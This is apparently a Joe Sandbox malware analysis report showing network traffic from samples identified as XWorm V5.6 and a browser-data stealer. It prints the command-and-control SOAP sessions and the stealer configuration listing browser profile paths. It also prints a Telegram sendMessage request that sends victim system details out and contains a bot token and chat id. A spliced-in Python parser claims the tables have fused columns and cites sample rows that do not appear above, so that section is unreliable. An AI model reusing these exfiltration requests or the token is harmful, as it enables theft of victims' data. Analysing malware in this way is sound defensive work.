Jul 16, 2024 21:07:13.946110010 CEST | 9336 | 49738 | 147.185.221.20 | 192.168.2.4
Jul 16, 2024 21:07:13.946263075 CEST | 9336 | 49738 | 147.185.221.20 | 192.168.2.4
Jul 16, 2024 21:07:13.946273088 CEST | 9336 | 49738 | 147.185.221.20 | 192.168.2.4
Jul 16, 2024 21:07:13.946280956 CEST | 9336 | 49738 | 147.185.221.20 | 192.168.2.4
Jul 16, 2024 21:07:13.946290016 CEST | 9336 | 49738 | 147.185.221.20 | 192.168.2.4
Jul 16, 2024 21:07:13.946300030 CEST | 9336 | 49738 | 147.185.221.20 | 192.168.2.4
Jul 16, 2024 21:07:13.946310043 CEST | 9336 | 49738 | 147.185.221.20 | 192.168.2.4
Jul 16, 2024 21:07:13.946321011 CEST | 9336 | 49738 | 147.185.221.20 | 192.168.2.4
Jul 16, 2024 21:07:13.970366001 CEST | 49738 | 9336 | 192.168.2.4 | 147.185.221.20
Jul 16, 2024 21:07:13.975318909 CEST | 9336 | 49738 | 147.185.221.20 | 192.168.2.4
Jul 16, 2024 21:07:14.649275064 CEST | 9336 | 49738 | 147.185.221.20 | 192.168.2.4
Jul 16, 2024 21:07:14.686018944 CEST | 49737 | 9336 | 192.168.2.4 | 147.185.221.20
Jul 16, 2024 21:07:14.686470032 CEST | 49738 | 9336 | 192.168.2.4 | 147.185.221.20
Jul 16, 2024 21:07:26.580599070 CEST | 49745 | 443 | 192.168.2.4 | 149.154.167.220
Jul 16, 2024 21:07:26.580646992 CEST | 443 | 49745 | 149.154.167.220 | 192.168.2.4
Jul 16, 2024 21:07:26.580723047 CEST | 49745 | 443 | 192.168.2.4 | 149.154.167.220
Jul 16, 2024 21:07:26.586972952 CEST | 49745 | 443 | 192.168.2.4 | 149.154.167.220
Jul 16, 2024 21:07:26.587058067 CEST | 443 | 49745 | 149.154.167.220 | 192.168.2.4
Jul 16, 2024 21:07:27.212874889 CEST | 443 | 49745 | 149.154.167.220 | 192.168.2.4
Jul 16, 2024 21:07:27.212960005 CEST | 49745 | 443 | 192.168.2.4 | 149.154.167.220
Jul 16, 2024 21:07:27.217207909 CEST | 49745 | 443 | 192.168.2.4 | 149.154.167.220
Jul 16, 2024 21:07:27.217237949 CEST | 443 | 49745 | 149.154.167.220 | 192.168.2.4
Jul 16, 2024 21:07:27.217648983 CEST | 443 | 49745 | 149.154.167.220 | 192.168.2.4
Jul 16, 2024 21:07:27.279992104 CEST | 49745 | 443 | 192.168.2.4 | 149.154.167.220
Jul 16, 2024 21:07:27.320576906 CEST | 443 | 49745 | 149.154.167.220 | 192.168.2.4
Jul 16, 2024 21:07:27.532825947 CEST | 443 | 49745 | 149.154.167.220 | 192.168.2.4
Jul 16, 2024 21:07:27.532907009 CEST | 443 | 49745 | 149.154.167.220 | 192.168.2.4
Jul 16, 2024 21:07:27.533035040 CEST | 49745 | 443 | 192.168.2.4 | 149.154.167.220
Jul 16, 2024 21:07:27.541403055 CEST | 49745 | 443 | 192.168.2.4 | 149.154.167.220
Jul 16, 2024 21:07:27.665505886 CEST | 49746 | 7000 | 192.168.2.4 | 45.88.186.18
Jul 16, 2024 21:07:27.670746088 CEST | 7000 | 49746 | 45.88.186.18 | 192.168.2.4
Jul 16, 2024 21:07:27.670845032 CEST | 49746 | 7000 | 192.168.2.4 | 45.88.186.18
Jul 16, 2024 21:07:27.710227013 CEST | 49746 | 7000 | 192.168.2.4 | 45.88.186.18
Jul 16, 2024 21:07:27.715507984 CEST | 7000 | 49746 | 45.88.186.18 | 192.168.2.4
Jul 16, 2024 21:07:40.914617062 CEST | 49746 | 7000 | 192.168.2.4 | 45.88.186.18
Jul 16, 2024 21:07:40.919631958 CEST | 7000 | 49746 | 45.88.186.18 | 192.168.2.4
Jul 16, 2024 21:07:41.041030884 CEST | 7000 | 49746 | 45.88.186.18 | 192.168.2.4
Jul 16, 2024 21:07:41.062982082 CEST | 49746 | 7000 | 192.168.2.4 | 45.88.186.18
Jul 16, 2024 21:07:41.072789907 CEST | 7000 | 49746 | 45.88.186.18 | 192.168.2.4
Jul 16, 2024 21:07:49.720726013 CEST | 7000 | 49746 | 45.88.186.18 | 192.168.2.4
Jul 16, 2024 21:07:49.767148972 CEST | 49746 | 7000 | 192.168.2.4 | 45.88.186.18
Jul 16, 2024 21:07:54.049020052 CEST | 49746 | 7000 | 192.168.2.4 | 45.88.186.18
Jul 16, 2024 21:07:54.056180000 CEST | 7000 | 49746 | 45.88.186.18 | 192.168.2.4
Jul 16, 2024 21:07:54.173265934 CEST | 7000 | 49746 | 45.88.186.18 | 192.168.2.4
Jul 16, 2024 21:07:54.175458908 CEST | 49746 | 7000 | 192.168.2.4 | 45.88.186.18
Jul 16, 2024 21:07:54.180380106 CEST | 7000 | 49746 | 45.88.186.18 | 192.168.2.4
Jul 16, 2024 21:08:07.236238003 CEST | 49746 | 7000 | 192.168.2.4 | 45.88.186.18
Jul 16, 2024 21:08:07.241177082 CEST | 7000 | 49746 | 45.88.186.18 | 192.168.2.4
Jul 16, 2024 21:08:07.360369921 CEST | 7000 | 49746 | 45.88.186.18 | 192.168.2.4
Jul 16, 2024 21:08:07.362879992 CEST | 49746 | 7000 | 192.168.2.4 | 45.88.186.18
Jul 16, 2024 21:08:07.368968010 CEST | 7000 | 49746 | 45.88.186.18 | 192.168.2.4
Jul 16, 2024 21:08:19.752585888 CEST | 7000 | 49746 | 45.88.186.18 | 192.168.2.4
Jul 16, 2024 21:08:19.798329115 CEST | 49746 | 7000 | 192.168.2.4 | 45.88.186.18
Jul 16, 2024 21:08:20.407951117 CEST | 49746 | 7000 | 192.168.2.4 | 45.88.186.18
Jul 16, 2024 21:08:20.412981987 CEST | 7000 | 49746 | 45.88.186.18 | 192.168.2.4
Jul 16, 2024 21:08:20.534259081 CEST | 7000 | 49746 | 45.88.186.18 | 192.168.2.4
Jul 16, 2024 21:08:20.536144972 CEST | 49746 | 7000 | 192.168.2.4 | 45.88.186.18
Jul 16, 2024 21:08:20.540997028 CEST | 7000 | 49746 | 45.88.186.18 | 192.168.2.4
Jul 16, 2024 21:08:33.579921007 CEST | 49746 | 7000 | 192.168.2.4 | 45.88.186.18
Jul 16, 2024 21:08:33.584827900 CEST | 7000 | 49746 | 45.88.186.18 | 192.168.2.4
Jul 16, 2024 21:08:33.706310987 CEST | 7000 | 49746 | 45.88.186.18 | 192.168.2.4
Jul 16, 2024 21:08:33.708604097 CEST | 49746 | 7000 | 192.168.2.4 | 45.88.186.18
Jul 16, 2024 21:08:33.713506937 CEST | 7000 | 49746 | 45.88.186.18 | 192.168.2.4
Jul 16, 2024 21:08:34.704807043 CEST | 49746 | 7000 | 192.168.2.4 | 45.88.186.18
Jul 16, 2024 21:08:34.711711884 CEST | 7000 | 49746 | 45.88.186.18 | 192.168.2.4
Jul 16, 2024 21:08:34.833762884 CEST | 7000 | 49746 | 45.88.186.18 | 192.168.2.4
Jul 16, 2024 21:08:34.835392952 CEST | 49746 | 7000 | 192.168.2.4 | 45.88.186.18
Jul 16, 2024 21:08:34.840375900 CEST | 7000 | 49746 | 45.88.186.18 | 192.168.2.4
Jul 16, 2024 21:08:38.111109018 CEST | 49746 | 7000 | 192.168.2.4 | 45.88.186.18
Jul 16, 2024 21:08:38.116164923 CEST | 7000 | 49746 | 45.88.186.18 | 192.168.2.4
Jul 16, 2024 21:08:38.173860073 CEST | 49746 | 7000 | 192.168.2.4 | 45.88.186.18
Jul 16, 2024 21:08:38.178839922 CEST | 7000 | 49746 | 45.88.186.18 | 192.168.2.4
Jul 16, 2024 21:08:38.237965107 CEST | 7000 | 49746 | 45.88.186.18 | 192.168.2.4
Jul 16, 2024 21:08:38.239489079 CEST | 49746 | 7000 | 192.168.2.4 | 45.88.186.18
Jul 16, 2024 21:08:38.244401932 CEST | 7000 | 49746 | 45.88.186.18 | 192.168.2.4
Jul 16, 2024 21:08:38.597297907 CEST | 7000 | 49746 | 45.88.186.18 | 192.168.2.4
Jul 16, 2024 21:08:38.597636938 CEST | 7000 | 49746 | 45.88.186.18 | 192.168.2.4
Jul 16, 2024 21:08:38.597716093 CEST | 49746 | 7000 | 192.168.2.4 | 45.88.186.18
Jul 16, 2024 21:08:38.598669052 CEST | 49746 | 7000 | 192.168.2.4 | 45.88.186.18
Jul 16, 2024 21:08:38.604367018 CEST | 7000 | 49746 | 45.88.186.18 | 192.168.2.4
Jul 16, 2024 21:08:39.392919064 CEST | 49746 | 7000 | 192.168.2.4 | 45.88.186.18
Jul 16, 2024 21:08:39.397799969 CEST | 7000 | 49746 | 45.88.186.18 | 192.168.2.4
Jul 16, 2024 21:08:39.517800093 CEST | 7000 | 49746 | 45.88.186.18 | 192.168.2.4
Jul 16, 2024 21:08:39.522290945 CEST | 49746 | 7000 | 192.168.2.4 | 45.88.186.18
Jul 16, 2024 21:08:39.527996063 CEST | 7000 | 49746 | 45.88.186.18 | 192.168.2.4
Jul 16, 2024 21:08:39.751717091 CEST | 49746 | 7000 | 192.168.2.4 | 45.88.186.18
Jul 16, 2024 21:08:39.758814096 CEST | 7000 | 49746 | 45.88.186.18 | 192.168.2.4
Jul 16, 2024 21:08:39.882244110 CEST | 7000 | 49746 | 45.88.186.18 | 192.168.2.4
Jul 16, 2024 21:08:39.883714914 CEST | 49746 | 7000 | 192.168.2.4 | 45.88.186.18
Jul 16, 2024 21:08:39.889446974 CEST | 7000 | 49746 | 45.88.186.18 | 192.168.2.4
Jul 16, 2024 21:08:39.986097097 CEST | 49746 | 7000 | 192.168.2.4 | 45.88.186.18
Jul 16, 2024 21:08:39.991817951 CEST | 7000 | 49746 | 45.88.186.18 | 192.168.2.4
Jul 16, 2024 21:08:40.112039089 CEST | 7000 | 49746 | 45.88.186.18 | 192.168.2.4
Jul 16, 2024 21:08:40.113358021 CEST | 49746 | 7000 | 192.168.2.4 | 45.88.186.18
Jul 16, 2024 21:08:40.118837118 CEST | 7000 | 49746 | 45.88.186.18 | 192.168.2.4
Jul 16, 2024 21:08:40.282839060 CEST | 49746 | 7000 | 192.168.2.4 | 45.88.186.18
Jul 16, 2024 21:08:40.289017916 CEST | 7000 | 49746 | 45.88.186.18 | 192.168.2.4
Jul 16, 2024 21:08:40.408025026 CEST | 7000 | 49746 | 45.88.186.18 | 192.168.2.4
Jul 16, 2024 21:08:40.409467936 CEST | 49746 | 7000 | 192.168.2.4 | 45.88.186.18
Jul 16, 2024 21:08:40.414591074 CEST | 7000 | 49746 | 45.88.186.18 | 192.168.2.4
Jul 16, 2024 21:08:41.392895937 CEST | 49746 | 7000 | 192.168.2.4 | 45.88.186.18
Jul 16, 2024 21:08:41.398011923 CEST | 7000 | 49746 | 45.88.186.18 | 192.168.2.4
Jul 16, 2024 21:08:41.521390915 CEST | 7000 | 49746 | 45.88.186.18 | 192.168.2.4
Jul 16, 2024 21:08:41.526226997 CEST | 49746 | 7000 | 192.168.2.4 | 45.88.186.18
Jul 16, 2024 21:08:41.531369925 CEST | 7000 | 49746 | 45.88.186.18 | 192.168.2.4
Jul 16, 2024 21:08:49.732553959 CEST | 7000 | 49746 | 45.88.186.18 | 192.168.2.4
Jul 16, 2024 21:08:49.782599926 CEST | 49746 | 7000 | 192.168.2.4 | 45.88.186.18
Jul 16, 2024 21:08:54.564570904 CEST | 49746 | 7000 | 192.168.2.4 | 45.88.186.18
Jul 16, 2024 21:08:54.569565058 CEST | 7000 | 49746 | 45.88.186.18 | 192.168.2.4
Jul 16, 2024 21:08:54.688723087 CEST | 7000 | 49746 | 45.88.186.18 | 192.168.2.4
Jul 16, 2024 21:08:54.690742016 CEST | 49746 | 7000 | 192.168.2.4 | 45.88.186.18
Jul 16, 2024 21:08:54.695543051 CEST | 7000 | 49746 | 45.88.186.18 | 192.168.2.4
Jul 16, 2024 21:09:00.439138889 CEST | 49746 | 7000 | 192.168.2.4 | 45.88.186.18
Jul 16, 2024 21:09:00.444197893 CEST | 7000 | 49746 | 45.88.186.18 | 192.168.2.4
Jul 16, 2024 21:09:00.454654932 CEST | 49746 | 7000 | 192.168.2.4 | 45.88.186.18
Jul 16, 2024 21:09:00.459585905 CEST | 7000 | 49746 | 45.88.186.18 | 192.168.2.4
Jul 16, 2024 21:09:00.501674891 CEST | 49746 | 7000 | 192.168.2.4 | 45.88.186.18
Jul 16, 2024 21:09:00.506616116 CEST | 7000 | 49746 | 45.88.186.18 | 192.168.2.4
Jul 16, 2024 21:09:00.517452002 CEST | 49746 | 7000 | 192.168.2.4 | 45.88.186.18
Jul 16, 2024 21:09:00.522418022 CEST | 7000 | 49746 | 45.88.186.18 | 192.168.2.4
Jul 16, 2024 21:09:00.532881021 CEST | 49746 | 7000 | 192.168.2.4 | 45.88.186.18
Jul 16, 2024 21:09:00.538017988 CEST | 7000 | 49746 | 45.88.186.18 | 192.168.2.4
Jul 16, 2024 21:09:00.568495035 CEST | 7000 | 49746 | 45.88.186.18 | 192.168.2.4
Jul 16, 2024 21:09:00.570353985 CEST | 49746 | 7000 | 192.168.2.4 | 45.88.186.18
Jul 16, 2024 21:09:00.620268106 CEST | 7000 | 49746 | 45.88.186.18 | 192.168.2.4
Jul 16, 2024 21:09:00.625375986 CEST | 7000 | 49746 | 45.88.186.18 | 192.168.2.4
Jul 16, 2024 21:09:00.627542973 CEST | 49746 | 7000 | 192.168.2.4 | 45.88.186.18
Jul 16, 2024 21:09:00.632462978 CEST | 7000 | 49746 | 45.88.186.18 | 192.168.2.4
Jul 16, 2024 21:09:00.665036917 CEST | 7000 | 49746 | 45.88.186.18 | 192.168.2.4
Jul 16, 2024 21:09:00.666543961 CEST | 49746 | 7000 | 192.168.2.4 | 45.88.186.18
Jul 16, 2024 21:09:00.712281942 CEST | 7000 | 49746 | 45.88.186.18 | 192.168.2.4
Jul 16, 2024 21:09:00.720381975 CEST | 7000 | 49746 | 45.88.186.18 | 192.168.2.4
Jul 16, 2024 21:09:00.722424984 CEST | 49746 | 7000 | 192.168.2.4 | 45.88.186.18
Jul 16, 2024 21:09:00.727335930 CEST | 7000 | 49746 | 45.88.186.18 | 192.168.2.4
Jul 16, 2024 21:09:00.727391958 CEST | 49746 | 7000 | 192.168.2.4 | 45.88.186.18
Jul 16, 2024 21:09:00.732356071 CEST | 7000 | 49746 | 45.88.186.18 | 192.168.2.4
Jul 16, 2024 21:09:07.720506907 CEST | 49746 | 7000 | 192.168.2.4 | 45.88.186.18
Jul 16, 2024 21:09:07.725668907 CEST | 7000 | 49746 | 45.88.186.18 | 192.168.2.4
Jul 16, 2024 21:09:07.853192091 CEST | 7000 | 49746 | 45.88.186.18 | 192.168.2.4
Jul 16, 2024 21:09:07.854397058 CEST | 49746 | 7000 | 192.168.2.4 | 45.88.186.18
Jul 16, 2024 21:09:07.859466076 CEST | 7000 | 49746 | 45.88.186.18 | 192.168.2.4
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jul 16, 2024 21:07:02.062232971 CEST | 53780 | 53 | 192.168.2.4 | 1.1.1.1
Jul 16, 2024 21:07:02.072988987 CEST | 53 | 53780 | 1.1.1.1 | 192.168.2.4
Jul 16, 2024 21:07:08.369249105 CEST | 53385 | 53 | 192.168.2.4 | 1.1.1.1
Jul 16, 2024 21:07:26.559582949 CEST | 61962 | 53 | 192.168.2.4 | 1.1.1.1
Jul 16, 2024 21:07:26.567786932 CEST | 53 | 61962 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jul 16, 2024 21:07:02.062232971 CEST | 192.168.2.4 | 1.1.1.1 | 0x9 | Standard query (0) | pst-child.gl.at.ply.gg | A (IP address) | IN (0x0001) | false
Jul 16, 2024 21:07:08.369249105 CEST | 192.168.2.4 | 1.1.1.1 | 0x415b | Standard query (0) | api.ip.sb | A (IP address) | IN (0x0001) | false
Jul 16, 2024 21:07:26.559582949 CEST | 192.168.2.4 | 1.1.1.1 | 0x6c86 | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jul 16, 2024 21:07:02.072988987 CEST | 1.1.1.1 | 192.168.2.4 | 0x9 | No error (0) | pst-child.gl.at.ply.gg |  | 147.185.221.20 | A (IP address) | IN (0x0001) | false
Jul 16, 2024 21:07:08.381776094 CEST | 1.1.1.1 | 192.168.2.4 | 0x415b | No error (0) | api.ip.sb | api.ip.sb.cdn.cloudflare.net |  | CNAME (Canonical name) | IN (0x0001) | false
Jul 16, 2024 21:07:26.567786932 CEST | 1.1.1.1 | 192.168.2.4 | 0x6c86 | No error (0) | api.telegram.org |  | 149.154.167.220 | A (IP address) | IN (0x0001) | false
                                                                                • api.telegram.org
                                                                                • pst-child.gl.at.ply.gg:9336
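The packet tables above reach the reader with their five columns run together (for example "933649738147.185.221.20192.168.2.4" is source port 9336, destination port 49738, 147.185.221.20 and 192.168.2.4). Splitting such a row is ambiguous in general: "49745443" is both 49745|443 and 4974|5443. The parser below is an added example, not part of the Joe Sandbox report or of any tool it names; it enumerates every split and keeps the one consistent with two assumptions that hold for every row above: the analysis VM is 192.168.2.4, and the VM side of each flow uses an ephemeral port (49152 or higher). The sample rows are copied from the tables above. It then counts packets per remote endpoint, which reproduces the host list above directly from the rows.

```python
"""Decode Joe Sandbox packet-table rows whose columns were fused by text extraction."""
import re
from collections import Counter
from dataclasses import dataclass

VM_IP = "192.168.2.4"          # assumption: the sandbox VM address (present in every row above)
EPHEMERAL_MIN = 49152          # assumption: the VM side of each flow uses a dynamic port
OCTET = r"(?:25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)"          # one octet, no leading zeros
IP_RE = re.compile(rf"{OCTET}\.{OCTET}\.{OCTET}\.{OCTET}")
ROW_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2} \d{1,2}, \d{4} \d{2}:\d{2}:\d{2}\.\d+ [A-Z]+)"
    r"(?P<rest>\d[\d.]*)$"
)


@dataclass(frozen=True)
class Packet:
    ts: str
    src_port: int
    dst_port: int
    src_ip: str
    dst_ip: str


def _split_ports(digits: str, vm_is_src: bool):
    """Yield (src_port, dst_port) splits of a fused digit run whose VM-side port is ephemeral."""
    for i in range(1, len(digits)):
        a, b = digits[:i], digits[i:]
        if a.startswith("0") or b.startswith("0"):   # ports are printed without leading zeros
            continue
        sp, dp = int(a), int(b)
        if not (1 <= sp <= 65535 and 1 <= dp <= 65535):
            continue
        if (sp if vm_is_src else dp) >= EPHEMERAL_MIN:
            yield sp, dp


def parse_row(line: str, vm_ip: str = VM_IP) -> Packet:
    """Decode one fused row; raise ValueError unless exactly one decoding survives."""
    m = ROW_RE.match(line.strip())
    if not m:
        raise ValueError(f"not a packet row: {line!r}")
    ts, rest = m.group("ts"), m.group("rest")
    found = set()
    start = 0
    while (idx := rest.find(vm_ip, start)) != -1:
        before, after = rest[:idx], rest[idx + len(vm_ip):]
        # VM is the source: <src_port><dst_port><vm_ip><remote_ip>
        if before.isdigit() and IP_RE.fullmatch(after):
            for sp, dp in _split_ports(before, vm_is_src=True):
                found.add(Packet(ts, sp, dp, vm_ip, after))
        # VM is the destination: <src_port><dst_port><remote_ip><vm_ip>
        if after == "":
            for j in range(1, len(before)):
                digits, ip = before[:j], before[j:]
                if digits.isdigit() and IP_RE.fullmatch(ip):
                    for sp, dp in _split_ports(digits, vm_is_src=False):
                        found.add(Packet(ts, sp, dp, ip, vm_ip))
        start = idx + 1
    if len(found) != 1:
        raise ValueError(f"{len(found)} decodings for {line!r}")
    return found.pop()


def summarize(lines, vm_ip: str = VM_IP) -> Counter:
    """Count packets per remote (ip, port), regardless of which side sent them."""
    flows = Counter()
    for line in lines:
        p = parse_row(line, vm_ip)
        remote = (p.dst_ip, p.dst_port) if p.src_ip == vm_ip else (p.src_ip, p.src_port)
        flows[remote] += 1
    return flows


# Rows copied from the TCP and UDP tables above (two packets per flow).
SAMPLE_ROWS = [
    "Jul 16, 2024 21:07:13.944891930 CEST933649738147.185.221.20192.168.2.4",
    "Jul 16, 2024 21:07:13.944911003 CEST497389336192.168.2.4147.185.221.20",
    "Jul 16, 2024 21:07:26.580599070 CEST49745443192.168.2.4149.154.167.220",
    "Jul 16, 2024 21:07:26.580646992 CEST44349745149.154.167.220192.168.2.4",
    "Jul 16, 2024 21:07:27.665505886 CEST497467000192.168.2.445.88.186.18",
    "Jul 16, 2024 21:07:27.670746088 CEST70004974645.88.186.18192.168.2.4",
    "Jul 16, 2024 21:07:02.062232971 CEST5378053192.168.2.41.1.1.1",
    "Jul 16, 2024 21:07:02.072988987 CEST53537801.1.1.1192.168.2.4",
]

if __name__ == "__main__":
    for (ip, port), n in summarize(SAMPLE_ROWS).most_common():
        print(f"{ip}:{port}  {n} packets")
```

The ephemeral-port rule is what resolves "49745443": with the VM as source, 4974 is not a dynamic port, so only 49745|443 survives. Rows for which more than one decoding survives raise instead of silently picking one, which is the behaviour you want when the output feeds an IOC list.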
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49730 | 147.185.221.20 | 9336 | 6528 | C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe
Timestamp | Bytes transferred | Direction | Data
Jul 16, 2024 21:07:02.207060099 CEST | 248 | OUT | POST / HTTP/1.1
                                                                                Content-Type: text/xml; charset=utf-8
                                                                                SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
                                                                                Host: pst-child.gl.at.ply.gg:9336
                                                                                Content-Length: 137
                                                                                Expect: 100-continue
                                                                                Accept-Encoding: gzip, deflate
                                                                                Connection: Keep-Alive
Jul 16, 2024 21:07:02.683413982 CEST | 25 | IN | HTTP/1.1 100 Continue
Jul 16, 2024 21:07:02.818061113 CEST | 359 | IN | HTTP/1.1 200 OK
                                                                                Content-Length: 212
                                                                                Content-Type: text/xml; charset=utf-8
                                                                                Server: Microsoft-HTTPAPI/2.0
                                                                                Date: Tue, 16 Jul 2024 19:07:02 GMT
                                                                                Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 74 72 75 65 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                                                                Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><CheckConnectResponse xmlns="http://tempuri.org/"><CheckConnectResult>true</CheckConnectResult></CheckConnectResponse></s:Body></s:Envelope>
Jul 16, 2024 21:07:07.866453886 CEST | 231 | OUT | POST / HTTP/1.1
                                                                                Content-Type: text/xml; charset=utf-8
                                                                                SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"
                                                                                Host: pst-child.gl.at.ply.gg:9336
                                                                                Content-Length: 144
                                                                                Expect: 100-continue
                                                                                Accept-Encoding: gzip, deflate
                                                                                Jul 16, 2024 21:07:08.009381056 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                                Jul 16, 2024 21:07:08.181982040 CEST | 1236 | IN | HTTP/1.1 200 OK
                                                                                Content-Length: 4744
                                                                                Content-Type: text/xml; charset=utf-8
                                                                                Server: Microsoft-HTTPAPI/2.0
                                                                                Date: Tue, 16 Jul 2024 19:07:08 GMT
                                                                                Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><EnvironmentSettingsResponse xmlns="http://tempuri.org/"><EnvironmentSettingsResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"><a:BlockedCountry xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/><a:BlockedIP xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/><a:Object4>true</a:Object4><a:Object6>false</a:Object6><a:ScanBrowsers>true</a:ScanBrowsers><a:ScanChromeBrowsersPaths xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"><b:string>%USERPROFILE%\AppData\Local\Battle.net</b:string><b:string>%USERPROFILE%\AppData\Local\Chromium\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\Google\Chrome\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\Google(x86)\Chrome\User Data</b:string><b:string>%USERPROFILE%\AppData\Roaming\Opera Software\</b:string><b:string>%USERPROFILE%\AppData\Local\MapleStudio\ChromePlus\User Data</b:string [TRUNCATED]


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                1 | 192.168.2.4 | 49737 | 147.185.221.209 | 9336 | 6528 | C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Jul 16, 2024 21:07:11.119765043 CEST | 229 | OUT | POST / HTTP/1.1
                                                                                Content-Type: text/xml; charset=utf-8
                                                                                SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"
                                                                                Host: pst-child.gl.at.ply.gg:9336
                                                                                Content-Length: 856137
                                                                                Expect: 100-continue
                                                                                Accept-Encoding: gzip, deflate
                                                                                Jul 16, 2024 21:07:13.523264885 CEST | 294 | IN | HTTP/1.1 200 OK
                                                                                Content-Length: 147
                                                                                Content-Type: text/xml; charset=utf-8
                                                                                Server: Microsoft-HTTPAPI/2.0
                                                                                Date: Tue, 16 Jul 2024 19:07:13 GMT
                                                                                Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><SetEnvironmentResponse xmlns="http://tempuri.org/"/></s:Body></s:Envelope>


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                2 | 192.168.2.4 | 49738 | 147.185.221.209 | 9336 | 6528 | C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Jul 16, 2024 21:07:13.532079935 CEST | 249 | OUT | POST / HTTP/1.1
                                                                                Content-Type: text/xml; charset=utf-8
                                                                                SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"
                                                                                Host: pst-child.gl.at.ply.gg:9336
                                                                                Content-Length: 856129
                                                                                Expect: 100-continue
                                                                                Accept-Encoding: gzip, deflate
                                                                                Connection: Keep-Alive
                                                                                Jul 16, 2024 21:07:14.649275064 CEST | 408 | IN | HTTP/1.1 200 OK
                                                                                Content-Length: 261
                                                                                Content-Type: text/xml; charset=utf-8
                                                                                Server: Microsoft-HTTPAPI/2.0
                                                                                Date: Tue, 16 Jul 2024 19:07:14 GMT
                                                                                Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetUpdatesResponse xmlns="http://tempuri.org/"><GetUpdatesResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"/></GetUpdatesResponse></s:Body></s:Envelope>


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                0 | 192.168.2.4 | 49745 | 149.154.167.220 | 443 | 6564 | C:\Users\user\AppData\Local\Temp\YsrQekGS.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                2024-07-16 19:07:27 UTC | 449 | OUT | GET /bot6973607627:AAGW_Zx412oiEhjCq5cqO_ZHLESeW8b4re4/sendMessage?chat_id=6678411703&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0AA15D1E2A246FDDBBF74C%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%2042ZXX86W9%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.6 HTTP/1.1
                                                                                Host: api.telegram.org
                                                                                Connection: Keep-Alive
                                                                                2024-07-16 19:07:27 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                Server: nginx/1.18.0
                                                                                Date: Tue, 16 Jul 2024 19:07:27 GMT
                                                                                Content-Type: application/json
                                                                                Content-Length: 464
                                                                                Connection: close
                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                Access-Control-Allow-Origin: *
                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                Data Ascii: {"ok":true,"result":{"message_id":703,"from":{"id":6973607627,"is_bot":true,"first_name":"Generalpage","username":"Generalpage_bot"},"chat":{"id":6678411703,"first_name":"Centric","last_name":"Pedal","username":"OSKIRED","type":"private"},"date":172115684


                                                                                Target ID:0
                                                                                Start time:15:06:58
                                                                                Start date:16/07/2024
                                                                                Path:C:\Users\user\Desktop\Ekpb7jn7mf.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Users\user\Desktop\Ekpb7jn7mf.exe"
                                                                                Imagebase:0x400000
                                                                                File size:289'471 bytes
                                                                                MD5 hash:4CE2C0836C46C61B588972B56A23D5E2
                                                                                Has elevated privileges:true
